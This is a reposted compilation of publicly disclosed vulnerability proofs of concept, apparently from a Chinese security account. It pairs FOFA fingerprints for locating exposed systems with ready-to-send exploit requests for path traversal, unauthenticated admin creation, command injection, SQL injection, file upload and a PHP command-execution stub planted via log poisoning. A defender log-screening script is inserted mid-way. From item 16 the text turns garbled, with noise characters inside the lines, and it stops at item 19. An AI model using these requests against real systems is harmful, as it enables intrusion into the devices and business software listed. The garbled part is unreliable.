Compilation of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article comes from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and this article is meant to help with defence. Defenders can use its contents to screen their own assets for exposure.

Sources: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly, in China and abroad, between September 2023 and May 2024. All of them were collected from other public accounts or websites and were compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability listed here is already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the relevant content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the most complete version; use your browser's page search to find keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).
Table of contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information leak
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 (Phicomm) router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 (Dahua) ICC intelligent IoT management platform arbitrary file read
21. 大华 (Dahua) ICC intelligent IoT management platform random remote code execution
22. 大华 (Dahua) ICC intelligent IoT management platform log4j remote code execution
23. 大华 (Dahua) ICC intelligent IoT management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视 (Uniview) video surveillance main-cgi password leak
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 (Hikvision) operations management center session command execution
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and below authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking payment system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardisation management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardisation management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualisation system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information leak
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want to use.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
Note the "./" in the path, which is there to slip past a literal match on /etc/passwd.
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 (Phicomm) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then send the request below (the ;stok= value in the path and the sysauth cookie are the session values issued at login; %s marks values to fill in). The injected command is the "id" appended to the wifiRebootrange field.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the following statement, URL-encoded twice (the application decodes once more after the web server does, which is why a single decode shows nothing suspicious):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step 2: POST to the login form. The language parameter points at ../../application/logs, and the login parameter carries a PHP stub that base64-decodes the K1SYJPMHLU4Z request header and passes it to system().
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword


Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of "echo ---------;id 2>&1;echo ---------;"; the date in the path is the day the log was written.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. Entries 14 and 15 reach the same getAllList endpoint: the ";.ico" suffix and the "a.ico/../" prefix both make the URL look like a static-resource request while the framework still routes it to getAllList, so any check should compare the normalised path rather than the raw one.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

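The script below is an added example for defenders, written for this page; it is not code from the original article or from any of the products listed. It screens access-log lines for the path-based probes in POCs 1-15. The endpoint table is lifted from those POCs, the log lines are constructed for the example, and the normalisation rules are this example's own assumptions about what a useful check needs: percent-decode until the text stops changing (POC 9 is encoded twice), drop ";" matrix parameters (POC 14 uses getAllList;.ico), collapse ".." (POC 2 and POC 15) and "./" (POC 6 requests /etc/./passwd) before comparing against the known endpoints.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Endpoints lifted from POCs 1-15 above, keyed by lower-cased canonical path.
SUSPECT_PATHS = {
    "/mem_tracker": "StarRocks unauthenticated access (POC 1)",
    "/api/v1/userlist": "EasyCVR user list leak (POC 3)",
    "/api/v1/adduser": "EasyCVR arbitrary user add (POC 4)",
    "/__debugging_center_utils___.php": "NUUO NVR command execution (POC 5)",
    "/svpn_html/loadfile.php": "Sangfor NGAF file read (POC 6)",
    "/808gps/mobileaction_download.action": "Hongyun file download (POC 7)",
    "/eis/service/api.aspx": "Landray EIS file upload (POC 10)",
    "/dossier/doc_fileedit_word.aspx": "Landray EIS SQL injection (POC 11)",
    "/ioffice/prg/interface/iofiledown.aspx": "iOffice file read (POC 13)",
    "/jsherp-boot/user/getalllist": "jshERP credential leak (POC 14/15)",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")
FILE_PROBE = re.compile(r"etc/passwd|win\.ini|jdbc\.properties", re.I)
SQLI = re.compile(r"\b(?:extractvalue|updatexml)\s*\(|waitfor\s+delay|@@version", re.I)

# Constructed Combined-Log-Format lines replaying POCs 2, 6, 9, 14 and 15, plus one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jun/2024:14:31:29 +0800] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1432',
    '203.0.113.5 - - [05/Jun/2024:14:31:30 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1432',
    '203.0.113.7 - - [05/Jun/2024:14:31:31 +0800] "GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31 HTTP/1.1" 500 210',
    '203.0.113.9 - - [05/Jun/2024:14:31:32 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 9120',
    '203.0.113.9 - - [05/Jun/2024:14:31:33 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 9120',
    '198.51.100.2 - - [05/Jun/2024:14:31:34 +0800] "GET /index.html HTTP/1.1" 200 512',
]


def decode_fully(text: str, limit: int = 3) -> str:
    """Percent-decode until the text stops changing, so %2527 and %27 both become a quote."""
    for _ in range(limit):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def canonical_path(path: str) -> str:
    """Drop ';' matrix parameters from each segment and collapse '.' and '..' as a servlet container would."""
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    return posixpath.normpath("/".join(segments) or "/").lower()


def screen_target(target: str) -> list[str]:
    """Return the findings for one request target (path plus query string)."""
    # Split before decoding so an encoded '?' or '#' inside the path cannot hide the real query.
    parts = urlsplit(target)
    path, query = decode_fully(parts.path), decode_fully(parts.query)
    findings = []
    if TRAVERSAL.search(path):
        findings.append("path traversal")
    # Normalise both halves so '/etc/./passwd' (POC 6) and '/static/../../etc/passwd' (POC 2) match.
    if FILE_PROBE.search(posixpath.normpath(path) + "?" + posixpath.normpath(query)):
        findings.append("sensitive file target")
    if SQLI.search(query):
        findings.append("SQL injection marker")
    known = SUSPECT_PATHS.get(canonical_path(path))
    if known:
        findings.append(known)
    return findings


def screen_log(lines) -> list[tuple[int, list[str]]]:
    """Return (line number, findings) for every log line that trips at least one rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings = screen_target(match.group("target"))
            if findings:
                hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in screen_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```

Run it as a script to see one line per hit; feed real logs by replacing SAMPLE_LOG with the file's lines. The endpoint table deliberately omits generic paths such as /search/index.php (POC 9), which would match legitimate traffic on other products; for those, the payload markers (traversal, sensitive file names, SQL functions) carry the detection instead.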
16.  红帆HFOffice医微云SQL注入
6 L+ b& R4 ~2 Y% X( [FOFA:title="HFOffice"+ X- @' @4 r* ]3 i- q# e
poc中调用函数计算1234的md5值
9 a# t  ~" \& s' qGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1) f7 g+ D8 x. e" o9 U5 {1 c: n5 V
Host: x.x.x.x
3 }8 y" w+ m$ C  B2 kUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36- h& ?1 `* J6 I! P
Connection: close
- o+ n1 j, _0 b3 H# `Accept: */*
1 g0 V9 R2 K- wAccept-Language: en& \# m5 |" U+ F' j+ a
Accept-Encoding: gzip
8 x0 |6 [( }# a' }; K: k$ z0 k/ ~0 T) d# a7 o/ _8 b9 u
( D& r" W5 r1 m% Q
17. 大华 DSS itcBulletin SQL 注入
+ `9 I& M9 k; [* `# m7 l$ e9 vFOFA:app="dahua-DSS"
2 L* Z3 r0 r. m- ~% CPOST /portal/services/itcBulletin?wsdl HTTP/1.1) X3 D- s. H7 z& v; q( x
Host: x.x.x.x
( c. r) S0 c* n9 }4 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ f9 S$ i! {) _" t9 sConnection: close" f% i. M8 r, s8 X% U! l  ?
Content-Length: 345
# j2 `" f" I! w8 J- lAccept-Encoding: gzip: }% L& n; ]! w  p9 T( l. O* |
" e# r7 d" E4 N. i9 k4 C
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>( Z% `5 y) a8 |% O( S) i
<s11:Body>
- B1 a2 K6 j3 ?+ [5 O2 v# H& N+ n    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
8 N2 W+ f& s3 M4 R      <netMarkings>
% j4 ^) P  D  K% k0 H* n       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
: d& `1 S6 \! ~3 x) H9 ^& d: J      </netMarkings>
- A* z' K9 u! N8 C) c6 z5 X- P    </ns1:deleteBulletin>
, L4 h5 V1 l" P* ?  </s11:Body>3 P9 e$ N+ i3 s$ Y8 J$ F8 J
</s11:Envelope>
- N4 M3 J2 T+ k. J2 @- {$ g
6 p/ k* A* Y# R9 q% G: u1 M( |" T0 C" [8 x' a: h' @4 O5 E3 i: r
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露7 ]4 R  p8 a9 I: f
FOFA:app="dahua-DSS"
! q, r+ a+ Z  ]GET /admin/cascade_/user_edit.action?id=1 HTTP/1.13 ~7 ?6 S) ~  Z; a( Z' w
Host: your-ip
; P* y3 r. ~4 X$ M% ]! PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& m4 @) J1 |* z( z  j$ l5 |' }
Accept-Encoding: gzip, deflate
) [0 O. p0 d1 w# W$ r: ]' uAccept: */*, O4 z5 W' n$ b" t" N" L- f
Connection: keep-alive2 ?0 r1 f% _: f/ P8 a' y

# P/ z) ~/ W& d$ W+ q8 t: Z7 h$ g

* h$ h3 K) j4 j8 U19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
8 N- I5 f3 Y; kFOFA:app="dahua-DSS"
